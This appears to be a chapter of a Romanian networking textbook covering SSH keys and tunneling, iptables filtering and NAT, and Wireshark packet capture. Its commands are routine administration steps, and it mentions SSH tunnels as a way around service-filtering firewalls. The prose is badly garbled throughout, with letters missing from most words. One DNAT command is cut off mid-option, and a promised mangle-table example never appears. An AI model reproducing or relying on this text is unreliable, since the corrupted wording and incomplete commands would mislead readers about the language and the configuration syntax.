Utilitarul ssh e ţi e şi e ifi ă auto at o ază de date u ide tifi ă ile azate pe ‘“A ale
tutu o aşi ilo pe a e utilizato ul s-a o e tat. Baza de date este ţi ută î
.ssh/known_hosts. Da ă i fo aţia de ide tifi a e a u ui se e se s hi ă, ssh afişează u
a e tis e t şi u pe ite aute tifi a ea utilizato ului pe t u a p e e i u ate tat la pa ola lui.
Opţiu ea StrictHostKeyChecking poate fi folosită pe t u a p e e i aute tifi ă ile pe aşi i
ale ă o hei u su t u oscute sau care au fost schimbate.
6.1.3.2 Generarea cheilor SSH

Aşa u se o se ă şi î etapa de i stala e a se e ului, este e esa ă ge e a ea u ei
pe e hi de hei pu li ă/p i ată . Î azul î a e se do eşte să se eeze o ouă pe e he de
hei, se foloseşte utilitarul ssh-keygen. Cu ajuto ul a estui utilita se eează două fişie e,
u ul pe t u fie a e heie. I pli it, î fişie ul ~/.ssh/id_rsa este păst ată heia p i ată, ia î
fişie ul ~/.ssh/id_rsa_pub heia pu li ă. Deoa e e heia p i ată u t e uie ţi ută la ede e,
ssh-keygen ofe ă posi ilitatea i t odu e ii u ei pa ole „passphrase , e a p oteja fişie ul î
a e se păst ează a easta.
root@myr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
bc:14:cc:41:ca:bc:b6:a2:10:63:19:cd:fc:68:da:32 root@ubuntu
root@ubuntu:~#
Î azul î a e se do eşte s hi a ea passphrase-ului se poate folosi opţiu ea –p:

root@myr:~# ssh-keygen -p
Enter file in which the key is (/root/.ssh/id_rsa):
Enter old passphrase:
Key has comment '/root/.ssh/id_rsa'
Enter new passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved with the new passphrase.
6.1.3.3 Co e tare fără parolă

Da ă se des hid sesiu i ““H f e e te u dife ite staţii e ofe ă aute tifi a e p i hei, se
poate folosi utilitarul ssh-agent. A esta se o upă de gestio a ea şi sto a ea heilo p i ate.
Pe t u o e ta ea fă ă pa olă pe se e ul la dista ţă, utilizato ul t e uie să îşi opieze heia
pu li ă î fişie ul $HOME/.ssh/authorized_keys, aflat pe server.
root@myr:~# ssh-copy-id -i /root/.ssh/id_rsa.pub student@localhost
21
Now try logging into the machine, with "ssh 'student@localhost'", and check in:
.ssh/authorized_keys
to make sure we haven't added extra keys that you weren't expecting.
După e se ealizează a est lu u, t e uie a ti at se i iul de sto a e a heilo p i ate

(ssh-agent şi apoi adăugate heile î a esta ssh-add . Pe t u adăuga ea heilo p i ate a
trebui introdus passphrase-ul fie ă eia, astfel î ât a esul să fie pe is pe t u adăuga ea lo
î fişie ul ~/.ssh/id_rsa. Î u a a esto paşi, o e ta ea se a fa e auto at, fă ă e oia
introducerii unei parole.
root@myr:~# ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-nWcDud7170/agent.7170; export SSH_AUTH_SOCK;
SSH_AGENT_PID=7171; export SSH_AGENT_PID;
echo Agent pid 7171;
root@ubuntu:~# ssh-add
Enter passphrase for /root/.ssh/id_rsa:
Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)
root@myr:~# ssh student@localhost

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Sep 18 14:55:00 2007 from localhost
214 | ‘ e ţ e l e L o a l e
6.1.3.4 Tunelare trafic printr-o conexiune SSH

Tu ela ea ““H ep ezi tă folosi ea p oto olului ““H şi a apa ilităţilo a estuia, pe t u a
securiza un transfe de date. Pe t u ea ea u ui tu el ““H, lie tul ““H este o figu at să
edi e teze u po t spe ifi at şi o ad esă IP e iste te pe se e ul ““H la dista ţă pe u po t al
staţiei lo ale. Odată e o e iu ea ““H a fost sta ilită, utilizato ul se poate onecta la portul
lo al pe t u a esa ea se i iilo aflate pe staţia la dista ţă pe se e ul ““H , se i ii e altfel
a fi putut fi a esi ile p i o e ta ea di e t pe po tul şi ad esa IP a staţiei la dista ţă. Cu alte
u i te, a eastă etodă poate fi ăzută a o î e a e de o oli e a firewall-urilor, ce
filt ează a u ite se i ii I te et.
Pe t u a ilust a ât ai i e ele e ţio ate ai sus se o side ă u ăto ul s e a iu. U
utilizato o iş uit do eşte să îşi iteas ă e ail-ul, folosind un client de email (Thunderbird,
fetchmail, mutt, Outlook et . . Da ă utilizato ul se o e tează di e t la se e ul de e-mail,
clientul de e- ail a t i ite u ele de utilizato şi pa ola î te t la . A est lu u ep ezi tă o
mare vulnerabilitate în cazul în care un i t us as ultă u u sniffer mediul.
Pe t u p e e i ea a estui ata se pot folosi apa ilităţile de tu ela e ofe ite de ““H. U
tu el ““H a fi folosit î odul u ăto : î lo să se ealizeze o e ta ea di e t la se e ul de
e-mail, se va stabili o conexiu e ““H ăt e u se e di i te io ul eţelei î a e espe ti ul
server de e- ail se află, sau di e t ăt e se e ul î suşi aşa u se î tâ plă el ai adesea,
când serverul de e- ail ofe ă şi se i iu ““H . Clie tul ““H a ealiza edi e ta ea po tului,
astfel î ât t afi ul e aju ge la staţia lo ală pe po tul po tul i pli it folosit de lie tul de
e ail , aju ge să fie edi e tat p i tu elul iptat ăt e se e ul de e-mail. Apoi clientul de
e ail poate fi o figu at să utilizeze po tul lo al, fii d pus astfe î legătu ă u se e ul de la
dista ţă.
E e plul u ăto ilust ează s e a iul dis utat:
root@myr:~# ssh –L 110:mailhost:110 -l user -N mailhost
mailhost ep ezi tă u ele se e ului de e ail, este po tul i pli it pe a e as ultă

clientul de email, user este u ele de utilizato şi opţiu ea –N spe ifi ă doa edi e ta ea
po tului, fă ă e e uta ea de o e zi.
U alt e e plu poate fi u ăto ul:
root@myr:~# ssh -L 7777:work:22 -l user gate
‘egula de ai sus poate fi i te p etată astfel: se deschide o sesiune SSH a utilizatorului

user, pe staţia gate. Cât ti p sesiu ea ă â e des hisă, toate o e iu ile ăt e po tul
de pe staţia lo ală su t edi e tate ăt e po tul de pe staţia work.
Pe t u o e ta ea p i tu el se spe ifi ă po tul lo al 7777.
root@myr:~# ssh –p 7777 localhost
Opţiu ea –L a spu e staţiei gate ă de fie a e dată â d a p i i date e i d u u

a aj de tu el, să des hidă o sesiu e pe po tul pe staţia work şi să t i ită espe ti ele
date. Toate datele sunt transmise staţiei gate u u po t su să aleato e : şi u u
a aj de tu el. Cu alte u i te, staţia lo ală a eptă o e iu i pe po tul şi t i ite toate
datele pe po tul staţiei gate, spunându-i ă a estea p o i de la „tu elul .
6-2: Tunelare SSH
Pe t u a e e plifi a lu u ile e ţio ate pâ ă a u , î se ţiu ea de ai jos este

prezentat modul în care se poate realiza un tunel SSH.
root@myr:~# ssh -L 7777:anaconda.cs.pub.ro:22 -l cico anaconda.cs.pub.ro
Password:
Last login: Sat Sep 22 13:30:01 2007 from 86.120.171.63
Linux anaconda 2.6.18-4-686 # 1 SMP Wed May 9 23:03:12 UTC 2007 i686
[....]
anaconda:~#
Astfel se ealizează des hide ea tu elului pe staţia anaconda.cs.pub.ro. Toate

conexiunile acum vor fi redirectate prin portul 7777. “e e ifi ă şi deshide ea a estuia pe staţia
lo ală.
root@myr:/etc/ssh# nmap -p 7775-7778 localhost
Starting Nmap 4.03 (http://www.insecure.org/nmap/) at 2007-09-22 14:03EEST
Interesting ports on localhost (127.0.0.1):
PORT STATE SERVICE
7775/tcp closed unknown
7777/tcp open unknown
Nmap finished: 1 IP address (1 host up) scanned in 0.057 seconds
După e sa confirmat ă po tul a fost des his, se poate realiza o conexiune prin
tunelul SSH deschis.
root@myr:/root/.ssh# ssh -p 7777 -l cico localhost
Password:
Last login: Sat Sep 22 13:58:01 2007 from 86.121.174.62
Linux anaconda 2.6.18-4-686 # 1 SMP Wed May 9 23:03:12 UTC 2007 i686
[....]
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
6.2 Firewall
P o a il ă el ai u os ut dispoziti de se u itate este firewall-ul. P i defi iţie,
firewall-ul este u siste sau u g up de siste e a e i ple e tează politi a de acces între
două sau ai ulte eţele. Firewall-urile pot fi clasificate în patru mari clase: firewall-uri
dedicate, firewall-uri integrate în routere, firewall-u i i teg ate î se e e şi firewall-uri
personale.
Firewall-urile dedicate su t aşi i e ulează u siste de ope a e spe ial o eput
pe t u filt a ea de pa hete şi t a slata ea de ad ese. E e ple de astfel de firewall-uri sunt
sistemele PIX sau CheckPoint. A este siste e su t apa ile să susţi ă u u ă a e de
o e iu i, da fa ilităţile de uta e su t e t e de li itate. Pe t u o eţea si plă se poate
folosi firewall-ul a oute , î să pe t u eţele ai o ple e este e esa u oute .
Firewall-urile integrate în routere su t folosite pe t u a î lătu a eaju sul a te io . Ele
u pot susţi e a elaşi u ă de o e iu i, da se des u ă ai i e î topologii ai o ple e,
216 | ‘ e ţ e l e L o a l e
unde este e oie de fa ilităţile u ui oute . Multe p oduse ofe ă fa ilităţi de firewall integrate
în routere, de la module de firewall pentru routere high-end, pâ ă la oute ele extrem de
o pa te, dedi ate utiliză ii î eţele “OHO1.
Firewall-urile de server su t i ple e tate a u soft a e adiţio al peste u siste de
ope a e de eţea Li u , NT, Wi K, No ell, UNIX . E e ple de astfel de pa hete soft a e
sunt: Netfilter, Microsoft ISA Server, Novell Border Manager. Ele su t o pa a ile a fa ilităţi
şi pe fo a ţe u firewall-urile integrate în routerele de nivel mediu.
Firewall-urile personale sunt instalate pe calculatoarele personale. Ele sunt concepute
pentru a preveni ata u i doa asup a al ulato ului pe a e ulează. Este i po ta t de eţi ut
ă a este tipu i de firewall-u i u su t opti izate pe t u eţele î t egi de al ulatoa e.
Exemple de firme ce produc firewall-uri personale sunt McAfee şi Symantec.
Principalele mecanisme prin care un firewall asigu ă p ote ţia eţelei su t filt a ea de
pa hete şi t a slata ea de ad ese, care vor fi analizate mai pe larg în continuare.
6.2.1 Filtrarea de pachete

Filtrarea de pachete este procesul prin care doar anumite pachete sunt rutate dintr-o
eţea î alta, pe aza u o eguli. Filt a ea de pa hete ope ează t adiţio al u i fo aţii de la
i elu ile O“I şi .
Regulile de filtrare sunt formate dintr-o pa te a e ide tifi ă pa hetul şi o pa te a e
spe ifi ă u să se t ateze pa hetul. Î pa tea de ide tifi a e se poate spe ifi a ad esa su să,
ad esa desti aţie, ad esa de eţea su să, ad esa de eţea desti aţie, p oto olul TCP, UDP,
ICMP , po tul su să sau desti aţie doa pe t u TCP sau UDP , tipul esajului pe t u ICMP ,
interfaţa de i t a e sau ieşi e, şi hia şi ad esele de i el doi. Î p i ipiu se poate fa e
ide tifi a ea pa hetului u o i e i fo aţie s isă î a tetul pa hetului, la i elul O“I , 4 sau
hia şi , î fu ţie de i ple e ta e.
Partea de tratare a pachetului spe ifi ă e a u e t e uie fă ut u pa hetele sele tate de
o egulă. Pe t u filt a e e istă î ge e al t ei posi ilităţi de t ata e: a epta e, ig o a e sau
espi ge e. Î azul a eptă ii, pa hetul este lăsat să t ea ă. Î azul ig o ă ii pa hetului u
este lăsat să t ea ă şi u se t i ite otifi a e ăt e su să. Î azul espi ge ii, pa hetul u este
lăsat să t ea ă, da se t i ite otifi a e ăt e su să u esaj ICMP al ă ui tip poate fi, î
u ele i ple e tă i, ales de el a e o st uieşte egula; de ele ai ulte o i se foloseşte u
mesaj ICMP de tip port-unreachable).
6.2.1.1 Utilitarul iptables

Iptables este utilita ul u ajuto ul ă uia se pot o figu a politi a şi egulile de filt a e de
pachete sau translatare de adrese pentru Linux 2.4. Acesta face parte din proiectul Netfilter,
a e i ple e tează î Li u filt a ea de pa hete şi t a slata ea de ad ese.
În iptables o egulă a e două pă ţi: o pa te a e ide tifi ă pa hetele şi u a a e spe ifi ă
u t e uie t atate pa hetele espe ti e pa tea ţi tă . P o esa ea egulilo se fa e se e ţial
î epâ d u p i a egulă. Da ă pe t u u pa het e t a e sează siste ul egula u e tă este
alidă se a e e ută a ţiu ea aso iată ţi tei. Da ă u, se t e e la u ătoa ea egulă. Da ă s-au
epuizat toate regulile dintr-u la ţ defi it de utilizato sau da ă ţi ta este RETURN, se o ti uă
a aliza ea egulilo di la ţul p e ede t. Da ă s-au epuizat toate regulile dintr-u la ţ
p edefi it, se e e ută a ţiu ea aso iată politi ii i pli ite a la ţului.
1
Small Office Home Office
Pachetul poate fi ide tifi at după ad esa su să, ad esa desti aţie, tipul pa hetului, po tul
TCP, UDP sau tipul esajului ICMP , i te faţa pe a e i t ă/iese pa hetul, da ă este
fragment dintr-u pa het, da ă este pa het a e i iţiază o o e iu e TCP .
La ţu ile su t setu i de eguli p i i te ediul ă o a se dete i ă e a ţiu e t e uie
luată asup a u ui pa het. Pe t u fie a e di t e ta elele defi ite filter, nat, mangle)
e istă la ţu i i pli ite INPUT, OUTPUT, FORWARD, PREROUTING, POSTROUTING e asigu ă o
st u tu ă dist i uită a egulilo . Cu alte u i te, la ţu ile p edefi ite u a a te izează o
si gu ă ta elă, ta elele î pă ţi d u ul sau ai ulte la ţu i. De e e plu, la ţul de OUTPUT
apa ţi e atât ta elei filter ât şi ta elei nat. La fel, la ţul de INPUT apa ţi e atât tabelei
filter ât şi ta elei mangle. Câ d u pa het aju ge la o staţie e i ple e tează o astfel de
politi ă azată pe ipta les , o t e ui luate a u ite de izii asup a a estuia, ealizâ du-se
a aliza fie ă ui la ţ e ţio at ai sus. Î figu a de ai jos se ilust ează odul î a e se a
fa e e ifi a ea fie ă ui la ţ.
PREROUTING FORWARD POSTROUTING
INPUT OUTPUT
Internet Decizie de rutare Internet
Proces
intern
Decizia de rutare
6-3: Flu ul pa hetelor pri la țurile predefi ite
PREROUTING INPUT FORWARD OUTPUT POSTROUTING

nat X X X
mangle X X X X X
filter X X X
6-4: Aso ierea di tre ta ele şi la țuri la iptables
6.2.1.2 Filtrarea de pachete folosind iptables

Pe t u filt a ea de pa hete se foloseşte tabela filter. Pe t u a eastă ta elă e istă t ei
la ţu i p edefi ite: INPUT - pachete ce sunt destinate routerului, OUTPUT - pachete generate
de oute , şi FORWARD - pachete care sunt rutate (pachete care nici nu sunt generate de router,
nici nu sunt destinate routerului).
Ţi tele e pot fi folosite sunt ACCEPT - pa hetele su t lăsate sa t ea ă, DROP - pachetele
sunt ignorate, QUEUE - pachetele sunt copiate în user-space pe t u a alize, şi LOG - pachetele
sunt scrise în log.
“e poate folosi de ase e ea şi REJECT pentru a respinge pachetele. La a eastă ţi tă se
poate specifica tipul mesajului icmp folosit pe t u otifi a e u opţiu ea --reject-with.
Pe t u a ilust a ai i e lu u ile e ţio ate ai sus fie u ătoa ea egulă:
iptables –t filter -A INPUT -s 10.0.0.0/8 -p icmp -j DROP
218 | ‘ e ţ e l e L o a l e
Regula de mai sus poate fi i te p etată î odul u ăto : toate pa hetele e su t

desti ate staţiei lo ale, e au ad esa IP su să î eţeaua . . . / şi su t de tip ICMP, u o fi
a eptate. Opţiu ea –t p e izează ta ela, î azul de faţă filter, -A (append) specifi ă
adăuga ea egulii la ţului de INPUT, -s spe ifi ă ad esa IP su să a pa hetelo , -p protocolul
folosit, iar –j (jump p e izează a ţiu ea e a t e ui î depli ită î azul î a e pa hetele se
î ad ează î egula espe ti ă.
În exemplul de mai jos este p eze tată configurarea iptables pentru filtrare de pachete
pe aşi a 141.85.37.1 di eţeaua 141.85.37.0/24. A eastă aşi ă este oute , firewall,
server de web, server de e- ail şi se e de DN“ şi a e o e tată eţeaua i te ă pe i te faţa
eth0 şi legătu a la I te et pe i te faţa eth1.
iptables -t filter -A INPUT -s 192.168.0.0/16 -j DROP
iptables -t filter -A INPUT -s 10.0.0.0/8 -j DROP
iptables -t filter -A INPUT -p tcp --destination-port 22 -j ACCEPT
iptables -t filter -A INPUT -p udp --destination-port 53 -j ACCEPT
iptables -t filter -A INPUT -p tcp ! --syn -j ACCEPT
iptables -t filter -A INPUT -j REJECT
iptables -t filter -A FORWARD -s 192.168.0.0/16 -j DROP
iptables -t filter -A FORWARD -s 10.0.0.0/8 -j DROP
iptables -t filter -A FORWARD -i eth1 -s 141.85.37.0/24 -j ACCEPT
iptables -t filter -A FORWARD -i eth0 -p tcp ! --syn -j ACCEPT
iptables -t filter -A FORWARD - j REJECT
iptables -t filter -A OUTPUT -s 192.168.0.0/16 -j DROP
iptables -t filter -A OUTPUT -s 10.0.0.0/8 -j DROP
Configurarea pentru pachetele e su t desti ate aşi ii la ţul INPUT o ţi e eguli

pentru filtrarea pachetelor cu adrese private (pentru a evita atacurile ce folosesc falsificare
ad eselo IP , ia apoi eguli pe t u a esa ea se i iilo e ulează pe aşi ă: se e ul de ssh,
serverul de web, serverul de e- ail, se e ul de DN“. Pe ulti a egulă este e esa ă da ă
do i să pute a esa de pe se e I te etul sau eţeaua lo ală. ‘egula a op i î e ă ile de
o e ta e la se e , da a lăsa pa hetele de ăspu s să se î toa ă la server.
Co figu a ea pe t u pa hetele e t e uie utate la ţul FORWARD î epe u două eguli
pe t u filt a ea pa hetelo u ad ese p i ate. U ătoa ea egulă a eptă toate pa hetele e
i di eţeaua i te ă şi au ad ese o e te pe t u a p e e i atacuri ce folosesc falsificarea
ad esei IP i iţiate di i te io ul eţelei . U ătoa ea egulă a eptă pa hetele di I te et e
su t epli i la t afi ul i iţiat di i te io , da u şi pa hetele de i iţie e a u o o e iu i ăt e
eţeaua i te ă.
În fine, o figu a ea pe t u pa hetele ge e ate de se e o ţi e eguli pe t u filt a ea
ad eselo p i ate, pe t u a e ita folosi ea se e ului î ata u i e falsifi ă ad esa IP.
6.2.2 Translatarea de adrese

Translatarea de adrese sau NAT (Network Address Translation) este procesul prin care se
odifi ă ad esele su să “NAT sau desti aţie DNAT di a u ite pa hete a e t e p i
firewall. Di pu tul de ede e al se u ităţii, t a slata ea de ad ese se foloseşte pe t u a
as u de odul de ad esa e i te şi pe t u a e ita a esa ea staţiilo i te e di e te io , p i
folosi ea u o ad ese p i ate î eţeaua i te ă, ad ese e o fi t a slatate la ad ese pu li e
pe t u a staţiile i te e să ai ă a es la I te et.
Pute o side a ă t a slata ea ad eselo este o fu ţie defi ită pe o ulţi e de ad ese
(A) cu rezultate într-o altă ulţi e de ad ese B . Astfel, fie a e pa het u o ad esă su să sau
desti aţie di ulţi ea A a fi î lo uită u o ad esă di ulţi ea B. “e spu e ă se ealizează
o translatare de adrese stati ă da ă fu ţia de t a slata e este i je ti ă, adi ă fie ă ei ad ese
di ulţi ea A îi corespunde o si gu ă ad esă o espu zătoa e î ulţi ea B. Da ă fu ţia de
t a slata e u este i je ti ă, adi ă da ă pe t u ai ulte ad ese di ulţi ea A o espu de

o si gu ă ad esă di ulţi ea B, a easta poa tă de u i ea de translatare de adrese
di a i ă.
A a tajul folosi ii t a slată ii de ad ese di a i e o stă î faptul ă se pot pa taja ad ese
uta ile dispo i ile. Astfel, al ulatoa elo di eţeaua lo ală li se alo ă ad ese p i ate, ia
routerul (firewall-ul a fa e o t a slata e de ad ese di a i ă di ulţi ea de ad ese p i ate
î ulţi ea de ad ese pu li e. “e o se ă î să ă a eastă a o da e pe ite a doa Ca d B
al ulatoa e di eţeaua lo ală să ai ă o e saţii si ulta e î I te et.
O etodă ai a a sată de t a slata e de ad ese o ep ezi tă t a slata ea de ad ese
sup aî ă ată NAT overloaded, de u ită u eo i şi PAT (Port Address Translation) sau
masquerading. A eastă etodă pe ite u u ă de ap o i ati de o e saţii
simultane de la orice host i te ăt e e te io u o si gu ă ad esă e te ă. I ple e ta ea
î lo uieşte pa hetul di eţeaua lo ală u ad esa su să “, ad esa desti aţie D, po tul su să P,
po tul desti aţie Q, u altul ou e a a ea ad esa su să M ad esa oute ului , ad esa
desti aţie D, po tul su să K. Po tul desti aţie u se s hi ă. De ase e ea se e o ează
asocierea (S,P) - K. Da ă u pa het aju ge pe oute di e te io , a â d ad esa desti aţie M,
ad esa su să Q şi po tul desti aţie K, atu i a est pa het a fi î lo uit u u altul u ad esa
desti aţie “, ad esa su să Q, po tul desti aţie P şi a fi t i is î eţeaua lo ală. Po tul su să u
se s hi ă.
6-5: NAT overloaded (PAT)
U az spe ial al PAT îl ep ezi tă redirectarea. În acest caz se va înlocui pachetul primit
di eţeaua lo ală a â d ad esa su să “, ad esa desti aţie D, po tul P u u altul a â d ad esa
su să “, ad esa desti aţie M ad esa oute ului , po tul ‘ po tul în care se face redirectarea,
spe ifi at de utilizato . ‘edi e ta ea este î ge e al folosită pe t u a i ple e ta u proxy
t a spa e t, az î a e pe oute ul M po tul ‘ as ultă u proxy configurat pentru proxy
transparent.
6.2.2.1 Translatarea de adrese folosind iptables

Pe t u t a slata ea de ad ese se foloseşte tabela nat. Î a eastă ta elă e istă t ei la ţu i
predefinite: PREROUTING - odifi ă pa hetul i ediat e a esta i t ă î oute , î ai te de a fi
rutat, OUTPUT - odifi ă pa hetele ge e ate lo al î ai te a a estea să i t e î p o esul de
220 | ‘ e ţ e l e L o a l e
uta e, şi POSTROUTING - odifi ă pa hetele e u ează să ple e di oute , după e a estea

au fost utate. Ţi tele alide su t ACCEPT, DROP, QUEUE, REJECT, LOG, SNAT, DNAT, MASQUARADE,
REDIRECT.
SNAT se foloseşte pe tru a indica o translatare de adrese de tip PAT pe ad esa su să.
Ad esa su să a pa hetului a fi odifi ată la u a di i te alul spe ifi at p i opţiu ea --to-
source. Cu a eeaşi opţiu e se poate spe ifi a şi i te alul î a e se a alege po tul su să â d
se fa e t a slata ea de ad ese. A eastă ţi tă este alidă u ai î la ţul POSTROUTING şi
la ţu ile he ate di a est la ţ .
DNAT se foloseşte pe t u o t a slata e de ad ese de tip PAT pe ad esa desti aţie. Ad esa
desti aţie a pa hetului a fi odifi ată la u a di i te alul spe ifi at p i opţiu ea --to-
destination. A eastă ţi tă este alidă u ai î la ţu ile PREROUTING şi OUTPUT şi la ţu ile
he ate di a est la ţ .
MASQUERADE este echivalent cu SNAT. Ad esa su să a fi î lo uită u ad esa setată a
inte feţei pe a e a fi t i is pa hetul. T e uie folosită î lo de SNAT da ă ad esa la a e se
fa e t a slata ea este setată di a i p i DHCP de e e plu .
REDIRECT se foloseşte pe t u a edi e ta pa hetul, lo al, pe po tul spe ifi at de opţiu ea
--to-port. A eastă ţi tă este alidă u ai î la ţu ile PREROUTING şi OUTPUT.
Pe t u a e ide ţia ai i e lu u ile e ţio ate ai sus pot fi analizate u ătoa ele două
reguli:
iptables -t nat -A POSTROUTING -o eth1 –s 192.168.0.0/24 -j SNAT --to-source 1.2.3.4
iptables -t nat -A PREROUTING –i eth0 -d 14.15.16.17 -j DNAT --to-destination 192.168.100.1
P i a egulă poate fi i te p etată î felul u ăto : toate pa hetele e i u ad esa IP

su să di eţeaua . . . / o fi t i ise pe i te faţa eth1 cu adresa IP su să . . . ,
după e a estea o fi utate. Cea de-a doua egulă a s hi a ad esa IP desti aţie
. . . a pa hetelo e i t ă pe i te faţa eth0 cu adresa IP 192.168.100.1, înainte ca
a estea să fie utate.
În exemplul de mai jos s-a prezentat configurarea iptables pentru translatarea de adrese
pe aşi a 141.85.37.1 di eţeaua 192.168.1.0/24. A eastă aşi ă este doa oute , ia
se e ul de e , se e ul de ail şi se e ul de DN“ ulează pe se e e dife ite, î eţeaua
i te ă. ‘oute ul a e o e tată i te faţa eth0 la eţeaua i te ă şi i te faţa eth1 la Internet.
iptables -t nat -A POSTROUTING -o eth1 -s 192.168.1.0/24 -j SNAT --to-source 141.85.37.1
iptables -t nat -A PREROUTING -i eth1 -p udp --destination-port 53 -j DNAT --to-
P i a li ie di e e plu este folosită pe t u a staţiile di eţea să poată a esa I te etul.

La t e e ea pa hetelo p i oute , ad esa su să a staţiilo ad esă p i ată a fi î lo uită u
ad esa oute ului ad esă pu li ă .
U ătoa ele li ii o t i ite t afi ul de e , e- ail şi DN“ ăt e se e ele di i te io . Î
a est o te t, di e te io , apa e t oute ul este şi se e de e , e- ail şi DN“.
6.2.3 Configurări avansate iptables
6.2.3.1 Port forwarding

Ce se î tâ plă da ă do i a se i iile di eţeaua i te ă, e su t fă ute pu li e, să fie
ăzute di e te io a ulâ d pe po tu i dife ite faţă de ele sta da d? Metoda e poate fi
apli ată ai i se u eşte port forwarding. A eastă etodă pe ite u ei staţii firewall să
t i ită e e ile e îi su t ad esate, altei staţii e a p o esa a este e e i. Cel ai folosit od

de î t e ui ţa e al a estei etode este a ela â d se e ele ulează pe staţii aflate î eţeaua
i te ă după firewall). Cu alte cuvinte, se presupune e iste ţa u ui gate a u două
i te feţe, eth0 fii d o e tată la eţeaua i te ă şi eth la I te et. Fie . . . ad esa IP
pu li ă a i te feţei eth1 şi . . . ad esa IP a staţiei pe a e ulează un serviciu web, pe
portul i pli it , staţie e a putea fi a esată di e te io . Î e e plul de ai jos se a fa e
edi e ta ea o e iu ilo e i pe . . . : <IP_e te :po t> ăt e . . . :
(IP_intern:port).
iptables -t nat -A PREROUTING -i eth1 -p tcp –d 141.85.37.1 –dport 8888 –j DNAT –-to-
destination 192.168.0.2:80
6.2.3.2 Alterarea a a sată a pa hetelor

Tabela mangle este folosită pe t u a odifi a pa hetele î t -un mod mai special. NAT
odifi ă doa ad esele di t -un pachet. Tabela mangle poate fi folosită pe tru a schimba
i fo aţii p e u TTL, TO“, sau pe t u a a a u pa het. Ma a ea pa hetelo este folosită
doa î i te io ul oute ului. Odată e u pa het pă ăseşte oute ul, i fo aţiile adăugate la
a a e o fi î depă tate. Î p eze t a a ea pa hetelo este folosită de ăt e siste ul de
Quality of Service (QoS).
E istă t ei la ţu i p edefi ite: INPUT - odifi ă pa hetele desti ate oute ului, FORWARD -
odifi ă pa hetele î u s de uta e, şi POSTROUTING - odifi ă pa hetele după uta e. Ţi tele
valide includ ACCEPT, DROP, QUEUE, REJECT, LOG p e u şi ele spe ifi e ta elei, p eze tate
mai jos.
MARK a hează pa hetul u aloa ea spe ifi ată p i opţiu ea --set-mark. Pachetele
marcate se pot folosi ulterior în procesul de rutare sau QoS.
TOS setează âmpul de type of service la aloa ea spe ifi ată p i opţiu ea --set-tos.
TTL setează â pul TTL la aloa ea spe ifi ată p i opţiu ea --ttl-set, de e e tează
aloa ea a estuia da ă se foloseşte opţiu ea --ttl-dec sau i e e tează aloa ea
acestuia (da ă se foloseşte opţiu ea --ttl-inc).
În exemplul de mai jos este p eze tat u e e plu de alte a e a a sată a pa hetelo , î
a e două staţii di eţeaua i te ă, 141.85.37.13 şi 141.85.37.169 pot accesa doar reţeaua
i te ă eţeaua depa ta e tului şi eţeaua i ediat u ătoa e eţeaua o ga izaţiei .
6.3 Capturare pachetelor şi analiza pachetelor. IDS/IPS.

Termenul de sniffing este u ul di ele ai popula e oţiu i folosite î lu ea
ad i ist ă ii eţelelo .
Sniffing este p o esul p i a e se aptu ează şi se a alizează t afi ul e t a e sează
segmentul local
Utilitarele folosite pentru captura de pachete au evoluat foarte mult de la începuturile
I te etului pâ ă astăzi. Ple â d de la aptu a ea î li ie de o a dă, s-au dezolvoltat
apli aţii o ple e î GUI, a e p ezi tă o ţi utul pa hetelo aptu ate î t -o structura bine
gâ dită si uşo de i te p etat. U a di a este apli aţii se u eşte Wireshark.
6.3.1 Wireshark – configurări de bază

Wi esha k este o apli aţie g atuită ealizată î ad ului u ui p oie t open-source, a ă ui
ol p i ipal este aptu a şi a aliza pa hetelo di eţea. Majoritatea administratorilor de
eţea u os Wireshark sub numele de Ethereal, pe t u ă pâ ă î a ul a esta e a de
222 | ‘ e ţ e l e L o a l e
fapt u ele at i uit utilita ului. T e uie spe ifi at ă u se u ă eşte niciun fel de exagerare
î afi aţia faptului ă Wireshark este o side at â a d eapta a o i ă ui ad i ist ato . Cu
ajuto ul său se poate fa e i spe ţia la i elul a te telo u ui pa het şi ai ult la i el de
stream TCP. Apli aţia se poate folosi atât î s opu i ad i ist ati e ât şi î s opu i de
troubleshooting pe t u eţea. Popula itatea a estei apli aţii este oti ată de:
 U GUI i tuiti şi uşo de utilizat
 Modul fa il de p eze ta e a i fo aţiei
 E iste ţa u o filt e o ple e pe aza ă o a se poate izola t afi ul i te esa t
6.3.1.1 Instalarea Wireshark

Instalarea Wireshark se face cu ajutorul utilitarului apt.
waters@myr:/etc/apt$ sudo apt-get install wireshark
Wireshark se poate po i di li ie de o a dă,

waters@myr:/etc/apt$ sudo wireshark &
sau, di i te faţa g afi ă GNOME, di Applications > Internet > Wireshark.

Ate ţie! Pentru a putea captura toate pachete, wireshark trebuie pornit ca root.
6.3.1.2 Pornirea unei capturi de pachete

Odată po it, se poate po i aptu a de pa hete pe u a di i te feţele a ti e. “ele ţia
i te feţei şi afişa ea opţiu ilo de aptu ă se face selectând Capture > Capture Options.
6-6: Pornirea capturii de pachete

Fe east a de opţiu i o ţi e u ătoa ele setă i:

 “ele tarea i terfeței: se poate alege i te faţa pe a e să se fa ă aptu a di t -o listă aflată î
partea de sus a ferestrei.
 Opţiu ea de a seta i te faţa î modul promiscuous: odul a esta i pu e a epta ea şi
aptu a tutu o pa hetelo , u doa ele desti ate staţiei. A eastă opţiu e e a folosită î t e ut
â d hu u ile î ă e au utilizate î topologii de eţea. Î p eze t a eastă opţiu e este
edu da tă pe t u eţele a late pe t u ă la i elul doi î t -o eţea se a afla e eu u
s it h a e u pe ite alt t afi pe u seg e t, î afa ă de t afi ul desti at u ei staţii aflate pe
acel segment. Totuşi, opţiu ea este e t e de utilă î azul i te feţelo wireless.
 Capture filter: a esta este â pul î a e se poate i t odu e u filt u de aptu ă. I pli it, â d
se po eşte o aptu ă, se o afişa toate pa hete e aju g la i te faţa de eţea. Da ă se
